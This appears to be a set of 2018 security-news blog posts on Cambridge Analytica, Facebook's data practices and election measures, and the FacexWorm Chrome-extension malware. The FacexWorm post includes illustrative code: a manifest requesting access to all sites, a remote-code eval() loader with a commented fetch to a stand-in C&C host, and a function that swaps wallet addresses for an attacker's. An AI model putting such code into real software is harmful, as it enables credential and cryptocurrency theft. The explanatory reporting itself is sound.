Cambridge Analytica is shutting down after the Facebook privacy scandal: is it true?

Cambridge Analytica, the commercial data analytics company at the centre of the Facebook privacy scandal, is ceasing all operations.

The commercial data analytics company Cambridge Analytica, protagonist of the biggest privacy scandal of recent years, has announced it is “ceasing all operations” following the Facebook data scandal.

An official statement released by the company states it had been “the subject of numerous unfounded accusations” and was “vilified for activities that are not only legal, but also widely accepted as a standard component of online advertising in both the political and commercial arenas.”

The firm used data harvested from Facebook to target US voters in the 2016 presidential election.

The data were collected by a group of academics who then shared them with Cambridge Analytica, a fact later confirmed by Facebook. The researchers used an app developed by University of Cambridge psychology lecturer Dr. Aleksandr Kogan to collect user data.

Cambridge Analytica has always denied any wrongdoing and declared that it never used the collected data to influence the presidential election.

In early April, Facebook revealed that 87 million users had been affected by the Cambridge Analytica case, far more than the 50 million initially thought.

In the wake of the scandal, Facebook decided to tighten its privacy restrictions.

“Over the past several months, Cambridge Analytica has been the subject of numerous unfounded accusations and, despite the company’s efforts to correct the record, has been vilified for activities that are not only legal, but also widely accepted as a standard component of online advertising in both the political and commercial arenas,” said Clarence Mitchell, a spokesman for Cambridge Analytica.

“Despite Cambridge Analytica’s unwavering confidence that its employees have acted ethically and lawfully, which view is now fully supported by Mr Malins’ report (independent investigator Julian Malins), the siege of media coverage has driven away virtually all of the company’s customers and suppliers,” continued the announcement issued today by the data analytics company.

“As a result, it has been determined that it is no longer viable to continue operating the business, which left Cambridge Analytica with no realistic alternative to placing the company into administration.”

While Cambridge Analytica declared it would help UK authorities investigate the Facebook scandal, last month Information Commissioner Elizabeth Denham stated that the company had failed to meet a deadline to produce the information requested by the authorities.

According to the official statement published by Cambridge Analytica on its website, its parent company SCL Elections was also commencing bankruptcy proceedings.

Journalists and experts are skeptical about the companies’ decision to shut down.

“The chair of a UK parliament committee investigating the firm’s activities also raised concerns about Cambridge Analytica and SCL Elections’ move,” the BBC reported.

“They are party to very serious investigations and those investigations cannot be impeded by the closure of these companies,” said Damian Collins MP.

“I think it’s absolutely vital that the closure of these companies is not used as an excuse to try and limit or restrict the ability of the authorities to investigate what they were doing.”

Is this the end of the story?

Of course not. Let me close with this statement published by The Guardian about the future plans of Alexander Nix and his collaborators.

“Although Cambridge Analytica might be dead, the team behind it has already set up a mysterious new company called Emerdata. According to Companies House data, Alexander Nix is listed as a director along with other executives from SCL Group. The daughters of the billionaire Robert Mercer are also listed as directors,” reads The Guardian.

FacexWorm targets cryptocurrency users and spreads through Facebook Messenger

Social networks can be a privileged attack vector for rapidly spreading malware to a huge audience: FacexWorm targets cryptocurrency users by spreading through Facebook Messenger.

In recent hours, a new threat has been spreading by leveraging an apparently harmless link to a video sent by a friend on Facebook Messenger.

Security researchers from Trend Micro have spotted a malicious Chrome extension, dubbed FacexWorm, which is spreading through Facebook Messenger and targeting users of cryptocurrency trading platforms to steal their accounts’ credentials and run cryptocurrency mining scripts.

“Our Cyber Safety Solutions team identified a malicious Chrome extension we named FacexWorm, which uses a miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser and propagates via Facebook Messenger,” reads the report published by Trend Micro.

According to the experts, FacexWorm was first detected in late April and appears to be linked to two other Facebook Messenger spam campaigns, one that occurred in August 2017 and a second one that was launched in December 2017 to spread the Digmine cryptocurrency miner.

Experts recently observed a spike in FacexWorm activity; the malicious code was detected in several countries, including Germany, Tunisia, Japan, Taiwan, South Korea, and Spain.

FacexWorm implements several features, including stealing account credentials from websites, like Google and cryptocurrency sites, redirecting victims to rogue cryptocurrency sites, injecting cryptocurrency miners, and redirecting victims to the attacker’s referral link for cryptocurrency-related referral programs.

The following image shows FacexWorm’s infection chain:


FacexWorm propagates via links sent over Facebook Messenger to the friends of an affected Facebook account, which redirect users to fake versions of popular video streaming websites, including YouTube. The user is encouraged to download the malicious Chrome extension as a codec needed to continue playing the video, and to grant it all the requested permissions to complete the installation. With this trick, the malware gains full control over any website the user visits.

Currently, the malicious extension targets only Chrome users; when the malware detects a different browser, it redirects the user to an innocuous-looking advertisement.

“FacexWorm is delivered through socially engineered links sent to Facebook Messenger. The links redirect to a fake YouTube page that will ask unwitting users to agree and install a codec extension (FacexWorm) in order to play the video on the page. It will then request privilege to access and change data on the opened website,” continues the report.
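To make the “request privilege to access and change data” step concrete, here is a rough sketch of what such an extension’s manifest might look like (Manifest V2, current at the time). The extension name and file names below are invented for illustration; the point is the `<all_urls>` pattern, which grants the “read and change all your data on the websites you visit” privilege across every page:

```json
{
  "manifest_version": 2,
  "name": "Video Codec Helper",
  "version": "1.0",
  "permissions": ["<all_urls>", "tabs", "storage"],
  "background": { "scripts": ["background.js"] },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["inject.js"],
      "run_at": "document_start"
    }
  ]
}
```

An extension installed with a manifest like this can inject scripts into, and read data from, any site the victim opens, which is exactly what the credential-stealing and mining behaviours described below require.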


Once the FacexWorm Chrome extension is installed on the victim’s PC, it downloads additional modules from its command-and-control (C&C) server to perform other malicious activities.

“FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine. It downloads additional JavaScript code from the C&C server when the browser is opened,” continues the report.

“Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage.”
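The load-code-on-every-page pattern Trend Micro describes can be sketched as follows. This is an illustration only, runnable in Node.js, with a hard-coded string standing in for the JavaScript a real sample would fetch from its C&C server or the GitHub repository mentioned above:

```javascript
// Illustration of the dynamic code loading pattern described above.
// A real extension would fetch the payload over the network on every
// page load; here a hard-coded string stands in for the remote code.
function fetchRemotePayload() {
  // Stand-in for something like: fetch("https://c2.example/payload.js")
  return "globalThis.stolen = 'credentials';";
}

function onNewPage() {
  const code = fetchRemotePayload();
  // eval() of freshly downloaded code is the red flag: the extension's
  // behaviour can change at any time without the extension itself
  // being updated, defeating store-side review of its packaged code.
  eval(code);
}

onNewPage();
console.log(globalThis.stolen); // prints "credentials"
```

The design choice matters for the attacker: because the packaged extension contains only a small loader, taking down the C&C payload (as GitHub and Facebook did) neuters the malware without the extension ever changing.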

Trend Micro detailed the malicious behaviors of the malware that include:

  • Steal the user’s account credentials for Google, MyMonero, and Coinhive.
  • Push a cryptocurrency scam. 
  • Conduct malicious web cryptocurrency mining.
  • Hijack cryptocurrency-related transactions.
  • Earn from cryptocurrency-related referral programs.
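Of these behaviours, the transaction hijacking is the simplest to illustrate. The sketch below is purely illustrative, runnable in Node.js; the address pattern is a naive stand-in and both addresses are made-up placeholders, not taken from real FacexWorm code:

```javascript
// Illustrative sketch of transaction hijacking: injected page code
// silently swaps the recipient wallet address the victim entered for
// the attacker's own address. Both addresses here are placeholders.
const ATTACKER_ADDRESS = "1AttackerPlaceholderAddrXXXXXXXXXX";

// Naive Bitcoin-style address pattern, for illustration only.
const BTC_ADDRESS = /\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b/g;

function hijackRecipient(fieldValue) {
  // Replace anything that looks like a wallet address in the form field.
  return fieldValue.replace(BTC_ADDRESS, ATTACKER_ADDRESS);
}

// The victim's intended recipient is silently replaced:
console.log(hijackRecipient("1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"));
```

Because the swap happens inside the already-rendered page, the victim sees a normal-looking payment form and has little chance to notice the substitution before confirming the transaction.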

Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users had been affected by the Cambridge Analytica case, far more than the 50 million initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimates of the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained that Facebook is implementing new privacy tools for its users, which would be available within the following week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”

Next week, on April 11, Facebook founder Mark Zuckerberg will appear before Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these latest revelations. A few days ago, Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations of data misuse.

Zuckerberg tried to reinforce his firm’s positive image, maintaining that one of the biggest errors he made was that Facebook is “idealistic.”

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive,” Zuckerberg said.

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced it had removed 70 Facebook accounts, 65 Instagram accounts, and 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm for its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency “has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

After the Cambridge Analytica scandal, Facebook announces election security improvements

After the Cambridge Analytica case, Facebook announced security improvements to prevent future interference with elections.

Facebook is under fire after the revelation of the Cambridge Analytica case and its role in the alleged interference in the 2016 US presidential election.

While analysts question possible interference with other events, including the Brexit vote, Facebook is now looking to prevent such operations against any election.

Guy Rosen, Facebook VP of Product Management, declared that everyone is responsible for preventing the same kind of attack on democracy and announced the significant effort Facebook will devote to it.

“By now, everyone knows the story: during the 2016 US election, foreign actors tried to undermine the integrity of the electoral process. Their attack included taking advantage of open online platforms — such as Facebook — to divide Americans, and to spread fear, uncertainty and doubt,” said Guy Rosen.

“Today, we’re going to outline how we’re thinking about elections, and give you an update on a number of initiatives designed to protect and promote civic engagement on Facebook.”

Facebook plans to improve the security of elections in four main areas: combating foreign interference, removing fake accounts, increasing ads transparency, and reducing the spread of false news.

Alex Stamos, Facebook’s Chief Security Officer, added that the company continually fights “fake news,” explaining that the term is used to describe many malicious activities, including:

  1. Fake identities – when an actor conceals their identity or takes on the identity of another group or individual;
  2. Fake audiences – using tricks to artificially expand the audience or the perception of support for a particular message;
  3. False facts – the assertion of false information; and
  4. False narratives – intentionally divisive headlines and language that exploit disagreements and sow conflict. This is the most difficult area, as different news outlets and consumers can have completely different views on what an appropriate narrative is, even if they agree on the facts.

“When you tease apart the overall digital misinformation problem, you find multiple types of bad content and many bad actors with different motivations,” said Alex Stamos.

“Once we have an understanding of the various kinds of “fake” we need to deal with, we then need to distinguish between motivations for spreading misinformation. Because our ability to combat different actors is based upon preventing their ability to reach these goals,” said Stamos.

“Each country we operate in and election we are working to support will have a different range of actors with techniques that are customized for that specific audience. We are looking ahead, by studying each upcoming election and working with external experts to understand the actors involved and the specific risks in each country.”

Stamos highlighted the importance of profiling the attackers; he distinguished profit-motivated organized groups, ideologically motivated groups, state-sponsored actors, people who enjoy causing chaos and disruption, and groups with multiple motivations.

Facebook is working to distinguish between motivations for spreading misinformation and implement the necessary countermeasures.


Facebook already devotes significant effort to combating fake news and any interference with elections.

Samidh Chakrabarti, Product Manager, Facebook, explained that the social media giant is currently blocking millions of fake accounts each day with a specific focus on those pages that are created to spread inauthentic civic content.

Chakrabarti explained that the number of pages and domains used to share fake news is increasing; in response, Facebook is doubling the number of people working on safety issues from 10,000 to 20,000. This hard job is made possible largely by sophisticated machine learning systems.

“Over the past year, we’ve gotten increasingly better at finding and disabling fake accounts. We’re now at the point that we block millions of fake accounts each day at the point of creation before they can do any harm.” said Chakrabarti.

“Rather than wait for reports from our community, we now proactively look for potentially harmful types of election-related activity, such as Pages of foreign origin that are distributing inauthentic civic content. If we find any, we then send these suspicious accounts to be manually reviewed by our security team to see if they violate our Community Standards or our Terms of Service. And if they do, we can quickly remove them from Facebook. “

But we all know that Facebook is a business that needs to increase profits; for this reason, ads are very important to it.

Facebook is building a new transparency feature for the ads on the platform, dubbed View Ads, that is currently in testing in Canada. View Ads allows anyone to view all the ads that a Facebook Page is running on the platform.

“You can click on any Facebook Page, and select About, and scroll to View Ads,” explained Rob Leathern, Product Management Director.

“Next we’ll build on our ads review process and begin authorizing US advertisers placing political ads. This spring, in the run-up to the US midterm elections, advertisers will have to verify and confirm who they are and where they are located in the US,” he added.

This summer, Facebook will launch a public archive with all the ads that ran with a political label.

Stay tuned ….

Facebook collected call and SMS data from Android users if not explicitly forbidden

After the Cambridge Analytica scandal, Facebook made the headlines again: the company had collected users’ Android call and SMS metadata for years.

The Cambridge Analytica case has raised discussion about the power of social networks and the possibility of their abuse to influence political activity.
Non-professionals have discovered how important their digital experience is and how companies specialized in data analysis operate without their knowledge.

Social network platforms hold an impressive quantity of information about us and are able not only to profile us but also to influence our choices.
Six years ago I was banned by the “democratic” Wikipedia because I coined a term describing how social networks can be manipulated; the entry “Social network poisoning” was deleted from the English Wikipedia but is still present in the Italian version.

Have a look at the translated version… and if you have friends at Wikipedia, tell them it was an error to ban me.

Back to the present: many of you probably still don’t know that if you have the Facebook Messenger app installed on your Android device, chances are the social network giant has been collecting your data, including contacts, SMS metadata (but not the message text), and call history (the start time of each call, its duration, and the contact’s name), at least until late last year.

The Facebook Messenger app logged phone call data only for numbers saved in the phone’s address book. That Facebook was collecting this kind of data is no surprise to tech-savvy people; we have discussed it in the past.

In January, the popular Italian expert Simone Margaritelli wrote a blog post (in Italian) on Medium inviting users to uninstall Facebook and WhatsApp.

The programmer Dylan McKay was able to find data, including logs of calls and SMS messages, in an archive he downloaded (as a ZIP file) from Facebook.

Mat Johnson, a Professor at the University of Houston Creative Writing Program, also made the same disturbing discovery.

The Cambridge Analytica case is giving users another point of view on the kind of data Facebook collects and how it is really used.

A Facebook spokesperson explained that the platform collects this data to improve the user experience.

“This [above] screen in the Messenger application offers to conveniently track all your calls and messages. But Facebook was already doing this surreptitiously on some Android devices until October 2017, exploiting the way an older Android API handled permissions.” wrote Sean Gallagher, Ars Technica’s IT and National Security Editor.

“Facebook began explicitly asking permission from users of Messenger and Facebook Lite to access SMS and call data to “help friends find each other” after being publicly shamed in 2016 over the way it handled the “opt-in” for SMS services. That message mentioned nothing about retaining SMS and call data, but instead it offered an “OK” button to approve “keeping all of your SMS messages in one place.””

In an official blog post, Facebook denied collecting call data surreptitiously; the social network giant highlighted that it never commercialized the data and that users are in total control of the data uploaded to the platform.

“When you sign up for Messenger or Facebook Lite on Android, or log into Messenger on an Android device, you are given the option to continuously upload your contacts as well as your call and text history.” reads the blog post published by Facebook. “For Messenger, you can either turn it on, choose ‘learn more’ or ‘not now’. On Facebook Lite, the options are to turn it on or ‘skip’. If you chose to turn this feature on, we will begin to continuously log this information, which can be downloaded at any time using the Download Your Information tool.”

Users can check the data collected by Facebook by going to Settings → Download a copy of your Facebook data → Start My Archive.

“Call and text history logging is part of an opt-in feature for people using Messenger or Facebook Lite on Android. This helps you find and stay connected with the people you care about, and provide you with a better experience across Facebook. People have to expressly agree to use this feature. If, at any time, they no longer wish to use this feature they can turn it off in settings, or here for Facebook Lite users, and all previously shared call and text history shared via that app is deleted. While we receive certain permissions from Android, uploading this information has always been opt-in only.” continues Facebook.

If you want to stop Facebook from continuously uploading your contacts to its servers, you can turn off the upload feature in the Messenger app. All previously uploaded contacts will then be deleted.

iOS users are not affected by this issue.

Lesson learned… every time we use an app, it is essential to carefully read the documentation that details how it works.